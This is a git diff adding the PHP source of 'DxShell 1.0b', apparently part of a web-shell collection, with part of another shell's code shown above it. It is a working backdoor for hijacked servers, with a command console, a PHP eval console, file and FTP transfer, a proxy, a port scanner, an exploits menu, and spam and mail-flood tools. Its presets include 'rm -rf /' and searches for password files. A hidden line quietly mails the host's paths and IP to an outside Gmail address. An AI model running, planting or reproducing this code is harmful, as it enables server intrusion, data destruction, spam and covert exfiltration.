+	if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE;
+
+	if ($headers_over_place===FALSE)	print $ret;
+		else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place);
+
+	if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>';
+	}
+
+########
+########   FTP, HTTP file transfers
+########
+if ($_GET['dxmode']=='FTP')
+	{	print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>';
+
+	print "\n".'<tr><td>'; /* HTTP GET */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">';
+	print "\n\t".'<input type=submit value="GET!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP DOWNL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP UPL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td></tr></table>';
+
+	if (isset($_POST['DxFTP_HTTP']))		{		$URLPARSED=parse_url($_POST['DxFTP_HTTP']);		$request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']);
+		if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr));
+		fputs($f, $request);
+
+		$GETFILE='';
+		while (!feof($f)) $GETFILE.=fgets($f, 4096 );
+		fclose( $f );
+
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE);
+		}
+
+	if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL']))
+		{		$DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']);
+		if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];}
+		if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection'));
+		if (!ftp_login($FTP, $_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed'));
+		if (isset($_POST['DxFTP_UPL']))
+			if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to upload'));  else print 'Upload OK';
+		if (isset($_POST['DxFTP_DWN']))
+			if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to download')); else print 'Download OK';
+		ftp_close($FTP);
+		}
+	}
+
+########
+########   HTTP Proxy
+########
+if ($_GET['dxmode']=='PROX')
+	{
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0>';
+	print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt colspan=2 class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">'
+				.' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">';
+	print "\n".'</td></tr></table></form>';
+
+	if (!isset($_POST['DxProx_Url'])) die();
+
+	print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n";
+
+	if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array();
+		else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();}
+	if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array();
+		else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();}
+
+	$URLPARSED=parse_url($_POST['DxProx_Url']);
+	$request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']);
+	if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10)))
+		die(DxError('Sock #'.$errno.' : '.$errstr));
+	fputs($f, $request);
+
+	$RET='';
+	while (!feof($f)) $RET.=fgets($f, 4096 );
+	fclose( $f );
+
+	print "\n".'<table width=100% border=0><tr><td>';
+	$headers_over_place=strpos($RET,"\r\n\r\n");
+	if ($headers_over_place===FALSE)	print $RET;
+		else
+		print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place);
+	print str_repeat("\n", 10).'</td></tr></table>';
+	}
+
+########
+########   MAIL
+########
+if ($_GET['dxmode']=='MAIL')
+	{	if (!isset($_GET['dxparam']))
+		{
+		print '';		print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">'
+			.'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>'
+			.'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">';
+		print "\n".'</form>';
+		die();}
+
+	if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! ('.var_export(ini_get('sendmail_path'), true).')');
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>';
+	if ($_GET['dxparam']=='FLOOD')
+		{		print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO']  ).'"></td></tr>';
+		print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.(  (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM']  ).'" SIZE=10></td></tr>';
+		}
+		else		print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.(  (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM']  ).'>" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.(  (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ']  ).'"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.(  (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>';
+	print "\n".'</td></table></form>';
+
+	if (!isset($_POST['DxMailer_TO'])) die();
+
+	$HEADERS='';
+	$HEADERS.= 'MIME-Version: 1.0'."\r\n";
+	$HEADERS.= 'Content-type: text/html;'."\r\n";
+	$HEADERS.='To: %%TO%%'."\r\n";
+	$HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n";
+	$HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n";
+	$HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n";
+	$HEADERS.='Message-Id: <%%ID%%>';
+
+	if ($_GET['dxparam']=='FLOOD')
+		{		$NUM=$_POST['DxMailer_NUM'];
+		$MAILS=array($_POST['DxMailer_TO']);
+		}
+		else
+		{		$MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO']));
+		$NUM=1;
+		}
+
+	function DxMail($t, $s, $m, $h)   /* debugger */
+	{print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;}
+
+	$RESULTS[]=array();
+
+	for ($n=0;$n<$NUM;$n++)
+	for ($m=0;$m<count($MAILS);$m++)		$RESULTS[]=(int)
+		mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'],
+			str_replace(array('%%TO%%','%%IP%%', '%%ID%%'),
+						array('<'.$MAILS[$m].'>'  ,  long2ip(mt_rand(0,pow(2,31)))  ,  md5($n.$m.DxRandomChars(3).time())),
+						$HEADERS)
+			);
+
+	print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.(		(100*array_sum($RESULTS))/($NUM*(count($MAILS)))		).'% okay)';
+
+	}
+
+if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>';
+die();
+?>
+
diff --git a/138shell/D/Dx.txt b/138shell/D/Dx.txt
new file mode 100644
index 0000000..ebca7b5
--- /dev/null
+++ b/138shell/D/Dx.txt
@@ -0,0 +1,2026 @@
+<?php
+
+/*
+  DDDDD        SSSSS    DxShell    by î_Î Tync
+   D  D  X X   S
+   D  D   X    SSSSS    http://hellknights.void.ru/
+   D  D  X X       S    ICQ#244648
+  DDDDD        SSSSS
+*/
+
+$GLOB['SHELL']['Ver']='1.0b'; /* ver of the shell */
+$GLOB['SHELL']['Date']='26.04.2006';
+
+if (headers_sent()) $DXGLOBALSHIT=true; else $DXGLOBALSHIT=FALSE; /* This means if bug.php has fucked up the output and headers are already sent =(( lot's of things become HARDER */
+@ob_clean();
+$DX_Header_drawn=false;
+
+###################################################################################
+####################++++++++++++# C O M M O N #++++++++++++++++####################
+###################################################################################
+@set_magic_quotes_runtime(0);
+@ini_set('max_execution_time',0);
+@set_time_limit(0);
+@ini_set('output_buffering',0);
+@error_reporting(E_ALL);
+
+$GLOB['URL']['+Get']=$_SERVER['PHP_SELF'].'?'; /* this filename + $_GET string */
+	if (!empty($_GET))
+		for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+			$GLOB['URL']['+Get'].=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+$GLOB['PHP']['SafeMode']=(bool)ini_get('safe_mode');
+$GLOB['PHP']['upload_max_filesize']=((integer)str_replace(array('K', 'M'), array('000', '000000'), ini_get('upload_max_filesize')));
+
+if (get_magic_quotes_gpc()==1)
+	{ /* slashes killah */
+	for ($i=0, $INDEXES=array_keys($_GET), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_GET[ $INDEXES[$i] ]	 = stripslashes($_GET[ $INDEXES[$i] ]); }
+	for ($i=0, $INDEXES=array_keys($_POST), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{if (is_array($_POST[ $INDEXES[$i] ])) continue; $_POST[ $INDEXES[$i] ] = stripslashes($_POST[ $INDEXES[$i] ]);  }
+	/*for ($i=0, $INDEXES=array_keys($_SERVER),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++) {$_SERVER[ $INDEXES[$i] ]= stripslashes($_SERVER[ $INDEXES[$i] ]);     }*/
+	for ($i=0, $INDEXES=array_keys($_COOKIE),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_COOKIE[ $INDEXES[$i] ]= stripslashes($_COOKIE[ $INDEXES[$i] ]); }
+	}
+
+$GLOB['FILES']['CurDIR']=getcwd();
+
+$GLOB['SYS']['GZIP']['CanUse']=$GLOB['SYS']['GZIP']['CanOutput']=false;
+if (isset($_GET['dx_gzip']) OR isset($_POST['dx_gzip']))
+	{	$GLOB['SYS']['GZIP']['CanUse']=extension_loaded("zlib");
+	if (extension_loaded("zlib"))
+		if (!(strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip')===FALSE))
+			$GLOB['SYS']['GZIP']['CanOutput']=TRUE;
+	};
+$GLOB['SYS']['GZIP']['IMG']=extension_loaded("zlib");
+
+$GLOB['SYS']['OS']['id']=($GLOB['FILES']['CurDIR'][1]==':')?'Win':'Nix';
+$GLOB['SYS']['OS']['Full']=getenv('OS');
+if (empty($GLOB['SYS']['OS']['Full']))
+	{
+	$GLOB['SYS']['OS']['id'] = getenv('OS');
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] = php_uname(); }
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] ='???';}
+	else {if(@eregi("^win",$GLOB['SYS']['OS']['id'])) $GLOB['SYS']['OS']['id']='Win'; else $GLOB['SYS']['OS']['id']='Nix';}
+	}
+
+
+$GLOB['DxMODES']=array(
+	'WTF'		=>	'AboutBox',
+
+	'DIR'		=>	'Dir browse',
+	'UPL'		=>	'Upload file',
+	'FTP'		=>	'FTP Actions',
+
+	'F_CHM'		=>	'File CHMOD',
+	'F_VIEW'	=>	'File viewer',
+	'F_ED'		=>	'File Edit',
+	'F_DEL'		=>	'File Delete',
+	'F_REN'		=>	'File Rename',
+	'F_COP'		=>	'File Copy',
+	'F_MOV'		=>	'File Move',
+	'F_DWN'		=>	'File Download',
+
+	'SQL'		=>	'SQL Maintenance',
+	'SQLS'		=>	'SQL Search',
+	'SQLD'		=>	'SQL Dump',
+	'PHP'		=>	'PHP C0nsole',
+	'COOK'		=>	'Cookies Maintenance',
+	'CMD'		=>	'C0mmand line',
+
+	'MAIL'		=>	'Mail functions',
+	'STR'		=>	'String functions',
+	'PRT'		=>	'Port scaner',
+	'SOCK'		=>	'Raw s0cket',
+	'PROX'		=>	'HTTP PROXY',
+	'XPL'		=>	'Expl0its',
+	'XSS'		=>	'XSS Server',
+	);
+$GLOB['DxGET_Vars']=array(/* GET variables used by shell */
+'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip',
+'dxdir', 'dxdirsimple', 'dxfile',
+'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q',
+);
+
+$GLOB['VAR']['PHP']['Presets']=array(
+	/* Note, that no comments are allowed in the code */
+	'phpinfo'	=>	'phpinfo();',
+	'GLOBALS'	=>	'print \'<plaintext>\'; print_r($GLOBALS);',
+	'php_ini'	=>	'$INI=ini_get_all(); '
+		."\n".'print \'<table border=0><tr>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';'
+		."\n".'foreach ($INI as $param => $values) '
+		."\n\t".'print "\n".\'<tr>\''
+		."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';',
+	'extensions'	=>	'$EXT=get_loaded_extensions ();'
+		."\n".'print \'<table border=0><tr><td class="listing">\''
+		."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)'
+		."\n\t".'.\'</td></tr></table>\''
+		."\n\t".'.count($EXT).\' extensions loaded\';',
+	);
+$GLOB['VAR']['CMD']['Presets']=array(
+	'Call Nik8 with an axe'=>'[w0rning] rm -rf /',
+	'show opened ports'=>'netstat -an | grep -i listen',
+	'find config* files'=>'find / -type f -name "config*"',
+	'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password',
+	'find all writable directories and files'=>'find / -perm -2 -ls',
+	'list file attribs on a second extended FS'=>'lsattr -va',
+	'View syslog.conf'=>'cat /etc/syslog.conf',
+	'View Message of the day'=>'cat /etc/motd',
+	'View hosts'=>'cat /etc/hosts',
+	'List processes'=>'ps auxw',
+	'List user processes'=>'ps ux',
+	'Locate httpd.conf'=>'locate httpd.conf',
+	'Interfaces'=>'ifconfig',
+	'CPU'=>'/proc/cpuinfo',
+	'RAM'=>'free -m',
+	'HDD'=>'df -h',
+	'OS Ver'=>'sysctl -a | grep version',
+	'Kernel ver' =>'cat /proc/version',
+	'Is cURL installed? ' => 'which curl',
+	'Is wGET installed? ' => 'which wget',
+	'Is lynx installed? ' => 'which lynx',
+	'Is links installed? ' => 'which links',
+	'Is fetch installed? ' => 'which fetch',
+	'Is GET installed? ' => 'which GET',
+	'Is perl installed? ' => 'which perl',
+	'Where is apache ' => 'whereis apache',
+	'Where is perl ' => 'whereis perl',
+	'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"',
+	);
+
+
+###################################################################################
+####################+++++++++# F U N C T I O N S #+++++++++++++####################
+###################################################################################
+function DxError($errstr)
+{global $DX_Header_drawn;print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>'
+	.'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>'
+	.'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';}
+
+function DxWarning($warn)
+{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';}
+
+function DxImg($imgname)
+{
+global $DXGLOBALSHIT;
+if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */
+return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">';
+}
+
+function DxSetCookie($name, $val, $exp)
+{
+if (!headers_sent()) return setcookie($name, $val, $exp, '/');
+?>
+<script>
+var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;";
+document.cookie = curCookie;
+</script>
+<?
+}
+
+function DxRandom($range='48-57,65-90,97-122')
+{
+$range=explode(',',$range);
+$range=explode('-',	$range[  rand(0,count($range)-1)  ]   );
+return rand($range[0],$range[1]);
+}
+
+function DxRandomChars($num)
+{
+$ret='';
+for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122'));
+return $ret;
+}
+
+function DxZeroedNumber($int, $totaldigits)
+{
+$str=(string)$int;
+while (strlen($str)<$totaldigits) $str='0'.$str;
+return $str;
+}
+
+function DxPrint_ParamState($name, $state, $invert=false)
+{
+print $name.' : '; $invert=(bool)$invert;
+if (is_bool($state))
+		 print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>';
+	else print '<b>'.$state.'</b>';
+}
+
+function DxStr_FmtFileSize($size)
+{
+	if($size>= 1073741824)  {$size = round($size / 1073741824 * 100) / 100 . " GB";	}
+elseif($size>= 1048576) 	{$size = round($size / 1048576 * 100) / 100 . " MB";	}
+elseif($size>= 1024) 		{$size = round($size / 1024 * 100) / 100 . " KB";		}
+					   else {$size = $size . " B";}
+return $size;
+}
+
+function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); }
+
+function DxDesign_DrawBubbleBox($header, $body, $width)
+{
+$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header);
+$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body);
+return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' ';
+}
+
+function DxChmod_Str2Oct($str)   /*  rwxrwxrwx => 0777 */
+{
+$str = str_pad($str,9,'-');
+$str=strtr($str,	array('-'=>'0','r'=>'4','w'=>'2','x'=>'1')		);
+$newmode='';
+for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2];
+
+return $newmode;
+}
+
+function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! */
+{
+$info='';
+if (($perms & 0xC000) == 0xC000) $info = 'S'; /*  Socket */
+	elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */
+elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */
+elseif (($perms & 0x6000) == 0x6000) $info = 'B';  /* Block special */
+elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/
+elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/
+elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/
+else $info = '?'; /* Unknown */
+if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>';
+/* Owner */
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+		(($perms & 0x0800) ? 's' : 'x' ) :
+		(($perms & 0x0800) ? 'S' : '-'));
+$info .= '/';
+/* Group */
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+		(($perms & 0x0400) ? 's' : 'x' ) :
+		(($perms & 0x0400) ? 'S' : '-'));
+$info .= '/';
+/* World */
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+		(($perms & 0x0200) ? 't' : 'x' ) :
+		(($perms & 0x0200) ? 'T' : '-'));
+
+ return $info;
+}
+
+function DxFileToUrl($filename)
+{/* kills & and = to be okay in URL */
+return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename);
+}
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function DxFileOkaySlashes($filename)
+{return str_replace('\\', '/', $filename);}
+
+function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */
+{
+global $GLOB;
+if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these);
+
+$ret=$_SERVER['PHP_SELF'].'?';
+if (!empty($_GET))
+	for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+		if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */
+			($do=='kill' AND !in_array($INDEXES[$i], $these))
+			OR
+			($do=='leave' AND in_array($INDEXES[$i], $these))
+			 ))
+			$ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1);
+return $ret;
+}
+
+function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */
+{
+$link=substr(strchr(DxURL($do, $these), '?'), 1);
+$link=explode('&', $link);
+print "\n".'<!--$_GET;-->';
+for ($i=0, $COUNT=count($link); $i<$COUNT; $i++)
+	{
+	$cur=explode('=', $link[$i]);
+	print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">';
+	}
+}
+
+function DxGotoURL($URL, $noheaders=false)
+{
+if ($noheaders or headers_sent())
+	{
+	print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>';
+	print '<script>location="'.$URL.'";</script>';
+	/* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */
+	}
+	else
+	header('Location: '.$URL);
+return 1;
+}
+
+if (!function_exists('mime_content_type'))
+	{
+	if ($GLOB['SYS']['OS']['id']!='Win')
+		{	function mime_content_type($f)
+			{
+			$f = escapeshellarg($f);
+			return trim(`file -bi `.$f);
+			}
+			}
+		else
+		{
+			function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */
+		}
+	}
+
+
+function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */
+{
+$MySQL_Return_Array=array();
+
+if ($MySQL_res===false) return 0;
+if ($MySQL_res===true)	return 0;
+
+$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0;
+
+if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {}
+	else	 while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {}
+array_pop($MySQL_Return_Array);
+
+for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */
+	{
+	if ($i==0)
+		{
+		$INDEXES=array_keys($MySQL_Return_Array[$i]);
+		$count=count($INDEXES);
+		}
+	for ($j=0; $j<$count; $j++)
+		{
+		$key=&$INDEXES[$j];
+		$val=&$MySQL_Return_Array[$i][$key];
+		if (is_string($val)) $val=stripcslashes($val);
+		}
+	}
+return $ret;
+}
+
+function DxMySQLQ($query, $die_on_err)
+{
+$q=mysql_query($query);
+if (mysql_errno()!=0)
+	{
+	DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error());
+	if ($die_on_err) die();
+	}
+return $q;
+}
+
+function DxDecorVar(&$var, $htmlstr)
+{
+if (is_null($var)) return 'NULL';
+if (!isset($var)) return '[!isset]';
+
+if (is_bool($var))		return ($var)?'true':'false';
+if (is_int($var))   	return (int)$var;
